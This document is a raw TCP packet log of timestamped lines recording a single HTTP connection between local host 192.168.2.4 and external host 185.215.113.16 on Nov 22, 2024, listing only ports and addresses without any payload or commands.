Nov 22, 2024 20:35:38.491003990 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.491061926 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.491218090 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.491280079 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.492213011 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.492297888 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.492300034 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.492340088 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.493330956 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.493387938 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.493495941 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.493541002 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.495012045 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.495086908 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.495354891 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.495409012 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.496504068 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.496561050 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.496602058 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.496643066 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.497725010 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.497771978 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.497805119 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.497844934 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.498574972 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.498620987 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.498667955 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.498707056 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.499480963 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.499591112 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.499635935 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.499650955 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.500442028 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.500490904 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.500500917 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.500541925 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.501346111 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.501394033 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.501432896 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.501473904 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.502331018 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.502391100 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.502521992 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.502563953 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.503505945 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.503535032 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.503555059 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.503576040 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.504623890 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.504673958 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.504714966 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.504761934 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.505734921 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.505788088 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.505856037 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.505893946 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.506925106 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.506974936 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.507013083 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.507057905 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.508013010 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.508059978 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.508063078 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.508109093 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.509172916 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.509221077 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.509260893 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.509309053 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.510334969 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.510380983 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.510406971 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.510468006 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.511451960 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.511504889 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.511537075 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.511600018 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.512533903 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.512603998 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.512666941 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.512713909 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.513668060 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.513717890 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.513806105 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.513849974 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.514914036 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.514961958 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.515038013 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.515085936 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.515929937 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.515979052 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.516055107 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.516103029 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.517075062 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.517124891 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.517185926 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.517234087 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.518208981 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.518259048 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.518357038 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.518399000 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.519355059 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.519403934 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.519454002 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.519495010 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.520519972 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.520567894 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.520601988 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.520639896 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.521586895 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.521635056 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.521712065 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.521760941 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.522726059 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.522774935 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.522859097 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.522958040 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.523857117 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.523909092 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.523969889 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.524024010 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.525059938 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.525130987 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.525193930 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.525238037 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.535783052 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.535836935 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.535836935 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.535850048 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.535886049 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.535895109 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.535911083 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.535933018 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.535945892 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.535967112 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.536005020 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.536041975 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.536055088 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.536079884 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.536092997 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.536108971 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.536111116 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.536130905 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.536133051 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.536154985 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.536156893 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.536185026 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.536185980 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.536192894 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.536202908 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.536217928 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.536230087 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.536236048 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.536262035 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.536279917 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.536495924 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.536545992 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.536614895 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.536663055 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.539235115 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.539287090 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.539335012 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.539347887 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.539367914 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.539400101 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.539414883 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.540496111 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.540548086 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.540601969 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.540648937 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.541023970 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.541074038 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.541117907 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.541166067 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.541584969 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.541631937 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.541750908 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.541795015 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.542737961 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.542788982 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.542824030 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.542871952 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.543865919 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.543917894 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.543987036 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.544050932 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.545042038 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.545090914 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.545161009 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.545207024 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.546118021 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.546175003 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.546236992 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.546284914 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.547343969 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.547394991 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.547425032 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.547468901 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.548424959 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.548470020 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.548472881 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.548510075 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.693239927 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.693278074 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.693304062 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.693325996 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.693478107 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.693522930 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.693603992 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.693655014 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.694677114 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.694725990 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.694768906 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.694817066 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.695765018 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.695808887 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.695811033 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.695849895 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.696952105 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.696964979 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.697017908 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.697999954 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.698054075 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.698122025 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.698165894 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.699161053 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.699209929 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.699279070 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.699330091 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.700298071 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.700345039 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.700381994 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.700429916 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.701400995 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.701447010 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.701520920 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.701567888 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.702553988 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.702598095 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.702668905 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.702713013 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.703701019 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.703747034 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.703748941 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.703787088 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.704811096 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.704857111 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.704884052 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.705017090 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.705946922 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.706003904 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.706075907 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.706125975 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.707102060 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.707158089 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.707182884 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.707221031 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.708187103 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.708246946 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.708381891 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.708458900 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.709335089 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.709386110 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.709448099 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.709494114 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.710495949 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.710546017 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.710582018 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.710624933 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.711607933 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.711668015 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.711752892 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.711801052 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.712730885 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.712783098 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.712868929 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.712923050 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.713867903 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.713917971 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.713989973 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.714044094 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.715059042 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.715110064 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.715146065 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.715193987 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.716137886 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.716188908 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.716247082 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.716286898 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.717288017 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.717339993 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.717363119 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.717408895 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.718395948 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.718470097 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.718489885 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.718532085 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.719551086 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.719592094 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.719640970 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.719687939 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.720665932 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.720705032 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.720792055 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.720827103 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.721787930 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.721841097 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.721842051 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.721883059 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.722930908 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.722976923 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.723001003 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.723042011 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.724071980 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.724119902 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.724199057 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.724244118 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.725229025 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.725275993 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.725433111 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.725476980 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.726331949 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.726378918 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.726444006 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.726485014 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.727544069 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.727598906 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.727663994 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.727710009 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.728591919 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.728641033 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.728719950 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.728761911 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.729733944 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.729779959 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.729928970 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.729970932 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.730863094 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.730909109 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.730976105 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.731018066 CET	49759	80	192.168.2.4	185.215.113.16
